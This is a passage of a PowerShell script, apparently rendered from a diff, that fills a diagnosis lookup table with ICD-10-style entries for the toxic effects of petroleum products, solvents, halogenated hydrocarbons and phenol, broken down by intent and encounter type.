$DiagnosisList.Rows.Add("Toxic effect of petroleum products, intentional self-harm","Toxic effect of petroleum products, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of petroleum products, assault","Toxic effect of petroleum products, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of petroleum products, assault","Toxic effect of petroleum products, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of petroleum products, assault","Toxic effect of petroleum products, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of petroleum products, undetermined","Toxic effect of petroleum products, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of petroleum products, undetermined","Toxic effect of petroleum products, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of petroleum products, undetermined","Toxic effect of petroleum products, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of benzene, accidental (unintentional)","Toxic effect of benzene, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of benzene, accidental (unintentional)","Toxic effect of benzene, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of benzene, accidental (unintentional)","Toxic effect of benzene, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of benzene, intentional self-harm","Toxic effect of benzene, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of benzene, intentional self-harm","Toxic effect of benzene, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of benzene, intentional self-harm","Toxic effect of benzene, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of benzene, assault","Toxic effect of benzene, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of benzene, assault","Toxic effect of benzene, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of benzene, assault","Toxic effect of benzene, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of benzene, undetermined","Toxic effect of benzene, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of benzene, undetermined","Toxic effect of benzene, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of benzene, undetermined","Toxic effect of benzene, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of homologues of benzene, accidental (unintentional)","Toxic effect of homologues of benzene, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of homologues of benzene, accidental (unintentional)","Toxic effect of homologues of benzene, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of homologues of benzene, accidental (unintentional)","Toxic effect of homologues of benzene, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of homologues of benzene, intentional self-harm","Toxic effect of homologues of benzene, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of homologues of benzene, intentional self-harm","Toxic effect of homologues of benzene, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of homologues of benzene, intentional self-harm","Toxic effect of homologues of benzene, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of homologues of benzene, assault","Toxic effect of homologues of benzene, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of homologues of benzene, assault","Toxic effect of homologues of benzene, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of homologues of benzene, assault","Toxic effect of homologues of benzene, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of homologues of benzene, undetermined","Toxic effect of homologues of benzene, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of homologues of benzene, undetermined","Toxic effect of homologues of benzene, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of homologues of benzene, undetermined","Toxic effect of homologues of benzene, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of glycols, accidental (unintentional)","Toxic effect of glycols, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of glycols, accidental (unintentional)","Toxic effect of glycols, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of glycols, accidental (unintentional)","Toxic effect of glycols, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of glycols, intentional self-harm","Toxic effect of glycols, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of glycols, intentional self-harm","Toxic effect of glycols, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of glycols, intentional self-harm","Toxic effect of glycols, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of glycols, assault","Toxic effect of glycols, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of glycols, assault","Toxic effect of glycols, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of glycols, assault","Toxic effect of glycols, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of glycols, undetermined","Toxic effect of glycols, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of glycols, undetermined","Toxic effect of glycols, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of glycols, undetermined","Toxic effect of glycols, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of ketones, accidental (unintentional)","Toxic effect of ketones, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ketones, accidental (unintentional)","Toxic effect of ketones, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ketones, accidental (unintentional)","Toxic effect of ketones, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of ketones, intentional self-harm","Toxic effect of ketones, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ketones, intentional self-harm","Toxic effect of ketones, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ketones, intentional self-harm","Toxic effect of ketones, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of ketones, assault","Toxic effect of ketones, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ketones, assault","Toxic effect of ketones, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ketones, assault","Toxic effect of ketones, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of ketones, undetermined","Toxic effect of ketones, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ketones, undetermined","Toxic effect of ketones, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ketones, undetermined","Toxic effect of ketones, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other organic solvents, accidental (unintentional)","Toxic effect of other organic solvents, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other organic solvents, accidental (unintentional)","Toxic effect of other organic solvents, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other organic solvents, accidental (unintentional)","Toxic effect of other organic solvents, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other organic solvents, intentional self-harm","Toxic effect of other organic solvents, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other organic solvents, intentional self-harm","Toxic effect of other organic solvents, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other organic solvents, intentional self-harm","Toxic effect of other organic solvents, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other organic solvents, assault","Toxic effect of other organic solvents, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other organic solvents, assault","Toxic effect of other organic solvents, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other organic solvents, assault","Toxic effect of other organic solvents, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other organic solvents, undetermined","Toxic effect of other organic solvents, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other organic solvents, undetermined","Toxic effect of other organic solvents, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other organic solvents, undetermined","Toxic effect of other organic solvents, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified organic solvent, accidental (unintentional)","Toxic effect of unspecified organic solvent, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified organic solvent, accidental (unintentional)","Toxic effect of unspecified organic solvent, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified organic solvent, accidental (unintentional)","Toxic effect of unspecified organic solvent, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified organic solvent, intentional self-harm","Toxic effect of unspecified organic solvent, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified organic solvent, intentional self-harm","Toxic effect of unspecified organic solvent, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified organic solvent, intentional self-harm","Toxic effect of unspecified organic solvent, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified organic solvent, assault","Toxic effect of unspecified organic solvent, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified organic solvent, assault","Toxic effect of unspecified organic solvent, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified organic solvent, assault","Toxic effect of unspecified organic solvent, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified organic solvent, undetermined","Toxic effect of unspecified organic solvent, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified organic solvent, undetermined","Toxic effect of unspecified organic solvent, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified organic solvent, undetermined","Toxic effect of unspecified organic solvent, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon tetrachloride, accidental (unintentional)","Toxic effect of carbon tetrachloride, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon tetrachloride, accidental (unintentional)","Toxic effect of carbon tetrachloride, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon tetrachloride, accidental (unintentional)","Toxic effect of carbon tetrachloride, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon tetrachloride, intentional self-harm","Toxic effect of carbon tetrachloride, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon tetrachloride, intentional self-harm","Toxic effect of carbon tetrachloride, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon tetrachloride, intentional self-harm","Toxic effect of carbon tetrachloride, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon tetrachloride, assault","Toxic effect of carbon tetrachloride, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon tetrachloride, assault","Toxic effect of carbon tetrachloride, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon tetrachloride, assault","Toxic effect of carbon tetrachloride, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon tetrachloride, undetermined","Toxic effect of carbon tetrachloride, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon tetrachloride, undetermined","Toxic effect of carbon tetrachloride, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of carbon tetrachloride, undetermined","Toxic effect of carbon tetrachloride, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of chloroform, accidental (unintentional)","Toxic effect of chloroform, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chloroform, accidental (unintentional)","Toxic effect of chloroform, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chloroform, accidental (unintentional)","Toxic effect of chloroform, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of chloroform, intentional self-harm","Toxic effect of chloroform, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chloroform, intentional self-harm","Toxic effect of chloroform, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chloroform, intentional self-harm","Toxic effect of chloroform, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of chloroform, assault","Toxic effect of chloroform, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chloroform, assault","Toxic effect of chloroform, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chloroform, assault","Toxic effect of chloroform, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of chloroform, undetermined","Toxic effect of chloroform, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chloroform, undetermined","Toxic effect of chloroform, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chloroform, undetermined","Toxic effect of chloroform, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of trichloroethylene, accidental (unintentional)","Toxic effect of trichloroethylene, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of trichloroethylene, accidental (unintentional)","Toxic effect of trichloroethylene, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of trichloroethylene, accidental (unintentional)","Toxic effect of trichloroethylene, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of trichloroethylene, intentional self-harm","Toxic effect of trichloroethylene, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of trichloroethylene, intentional self-harm","Toxic effect of trichloroethylene, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of trichloroethylene, intentional self-harm","Toxic effect of trichloroethylene, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of trichloroethylene, assault","Toxic effect of trichloroethylene, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of trichloroethylene, assault","Toxic effect of trichloroethylene, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of trichloroethylene, assault","Toxic effect of trichloroethylene, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of trichloroethylene, undetermined","Toxic effect of trichloroethylene, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of trichloroethylene, undetermined","Toxic effect of trichloroethylene, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of trichloroethylene, undetermined","Toxic effect of trichloroethylene, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of tetrachloroethylene, accidental (unintentional)","Toxic effect of tetrachloroethylene, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tetrachloroethylene, accidental (unintentional)","Toxic effect of tetrachloroethylene, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tetrachloroethylene, accidental (unintentional)","Toxic effect of tetrachloroethylene, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of tetrachloroethylene, intentional self-harm","Toxic effect of tetrachloroethylene, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tetrachloroethylene, intentional self-harm","Toxic effect of tetrachloroethylene, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tetrachloroethylene, intentional self-harm","Toxic effect of tetrachloroethylene, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of tetrachloroethylene, assault","Toxic effect of tetrachloroethylene, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tetrachloroethylene, assault","Toxic effect of tetrachloroethylene, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tetrachloroethylene, assault","Toxic effect of tetrachloroethylene, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of tetrachloroethylene, undetermined","Toxic effect of tetrachloroethylene, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tetrachloroethylene, undetermined","Toxic effect of tetrachloroethylene, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of tetrachloroethylene, undetermined","Toxic effect of tetrachloroethylene, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of dichloromethane, accidental (unintentional)","Toxic effect of dichloromethane, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of dichloromethane, accidental (unintentional)","Toxic effect of dichloromethane, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of dichloromethane, accidental (unintentional)","Toxic effect of dichloromethane, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of dichloromethane, intentional self-harm","Toxic effect of dichloromethane, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of dichloromethane, intentional self-harm","Toxic effect of dichloromethane, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of dichloromethane, intentional self-harm","Toxic effect of dichloromethane, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of dichloromethane, assault","Toxic effect of dichloromethane, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of dichloromethane, assault","Toxic effect of dichloromethane, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of dichloromethane, assault","Toxic effect of dichloromethane, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of dichloromethane, undetermined","Toxic effect of dichloromethane, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of dichloromethane, undetermined","Toxic effect of dichloromethane, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of dichloromethane, undetermined","Toxic effect of dichloromethane, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorofluorocarbons, accidental (unintentional)","Toxic effect of chlorofluorocarbons, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorofluorocarbons, accidental (unintentional)","Toxic effect of chlorofluorocarbons, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorofluorocarbons, accidental (unintentional)","Toxic effect of chlorofluorocarbons, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorofluorocarbons, intentional self-harm","Toxic effect of chlorofluorocarbons, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorofluorocarbons, intentional self-harm","Toxic effect of chlorofluorocarbons, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorofluorocarbons, intentional self-harm","Toxic effect of chlorofluorocarbons, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorofluorocarbons, assault","Toxic effect of chlorofluorocarbons, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorofluorocarbons, assault","Toxic effect of chlorofluorocarbons, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorofluorocarbons, assault","Toxic effect of chlorofluorocarbons, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorofluorocarbons, undetermined","Toxic effect of chlorofluorocarbons, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorofluorocarbons, undetermined","Toxic effect of chlorofluorocarbons, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of chlorofluorocarbons, undetermined","Toxic effect of chlorofluorocarbons, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aliphatic hydrocarbons, accidental (unintentional)","Toxic effect of other halogen derivatives of aliphatic hydrocarbons, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aliphatic hydrocarbons, accidental (unintentional)","Toxic effect of other halogen derivatives of aliphatic hydrocarbons, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aliphatic hydrocarbons, accidental (unintentional)","Toxic effect of other halogen derivatives of aliphatic hydrocarbons, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aliphatic hydrocarbons, intentional self-harm","Toxic effect of other halogen derivatives of aliphatic hydrocarbons, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aliphatic hydrocarbons, intentional self-harm","Toxic effect of other halogen derivatives of aliphatic hydrocarbons, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aliphatic hydrocarbons, intentional self-harm","Toxic effect of other halogen derivatives of aliphatic hydrocarbons, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aliphatic hydrocarbons, assault","Toxic effect of other halogen derivatives of aliphatic hydrocarbons, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aliphatic hydrocarbons, assault","Toxic effect of other halogen derivatives of aliphatic hydrocarbons, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aliphatic hydrocarbons, assault","Toxic effect of other halogen derivatives of aliphatic hydrocarbons, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aliphatic hydrocarbons, undetermined","Toxic effect of other halogen derivatives of aliphatic hydrocarbons, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aliphatic hydrocarbons, undetermined","Toxic effect of other halogen derivatives of aliphatic hydrocarbons, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aliphatic hydrocarbons, undetermined","Toxic effect of other halogen derivatives of aliphatic hydrocarbons, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aromatic hydrocarbons, accidental (unintentional)","Toxic effect of other halogen derivatives of aromatic hydrocarbons, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aromatic hydrocarbons, accidental (unintentional)","Toxic effect of other halogen derivatives of aromatic hydrocarbons, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aromatic hydrocarbons, accidental (unintentional)","Toxic effect of other halogen derivatives of aromatic hydrocarbons, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aromatic hydrocarbons, intentional self-harm","Toxic effect of other halogen derivatives of aromatic hydrocarbons, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aromatic hydrocarbons, intentional self-harm","Toxic effect of other halogen derivatives of aromatic hydrocarbons, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aromatic hydrocarbons, intentional self-harm","Toxic effect of other halogen derivatives of aromatic hydrocarbons, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aromatic hydrocarbons, assault","Toxic effect of other halogen derivatives of aromatic hydrocarbons, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aromatic hydrocarbons, assault","Toxic effect of other halogen derivatives of aromatic hydrocarbons, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aromatic hydrocarbons, assault","Toxic effect of other halogen derivatives of aromatic hydrocarbons, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aromatic hydrocarbons, undetermined","Toxic effect of other halogen derivatives of aromatic hydrocarbons, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aromatic hydrocarbons, undetermined","Toxic effect of other halogen derivatives of aromatic hydrocarbons, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other halogen derivatives of aromatic hydrocarbons, undetermined","Toxic effect of other halogen derivatives of aromatic hydrocarbons, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, accidental (unintentional)","Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, accidental (unintentional)","Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, accidental (unintentional)","Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, intentional self-harm","Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, intentional self-harm","Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, intentional self-harm","Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, assault","Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, assault","Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, assault","Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, undetermined","Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, undetermined","Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, undetermined","Toxic effect of unspecified halogen derivatives of aliphatic and aromatic hydrocarbons, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of phenol and phenol homologues, accidental (unintentional)","Toxic effect of phenol and phenol homologues, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of phenol and phenol homologues, accidental (unintentional)","Toxic effect of phenol and phenol homologues, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of phenol and phenol homologues, accidental (unintentional)","Toxic effect of phenol and phenol homologues, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of phenol and phenol homologues, intentional self-harm","Toxic effect of phenol and phenol homologues, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of phenol and phenol homologues, intentional self-harm","Toxic effect of phenol and phenol homologues, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of phenol and phenol homologues, intentional self-harm","Toxic effect of phenol and phenol homologues, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of phenol and phenol homologues, assault","Toxic effect of phenol and phenol homologues, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of phenol and phenol homologues, assault","Toxic effect of phenol and phenol homologues, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of phenol and phenol homologues, assault","Toxic effect of phenol and phenol homologues, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of phenol and phenol homologues, undetermined","Toxic effect of phenol and phenol homologues, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of phenol and phenol homologues, undetermined","Toxic effect of phenol and phenol homologues, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of phenol and phenol homologues, undetermined","Toxic effect of phenol and phenol homologues, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other corrosive organic compounds, accidental (unintentional)","Toxic effect of other corrosive organic compounds, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other corrosive organic compounds, accidental (unintentional)","Toxic effect of other corrosive organic compounds, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other corrosive organic compounds, accidental (unintentional)","Toxic effect of other corrosive organic compounds, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other corrosive organic compounds, intentional self-harm","Toxic effect of other corrosive organic compounds, intentional self-harm, initial encounter") 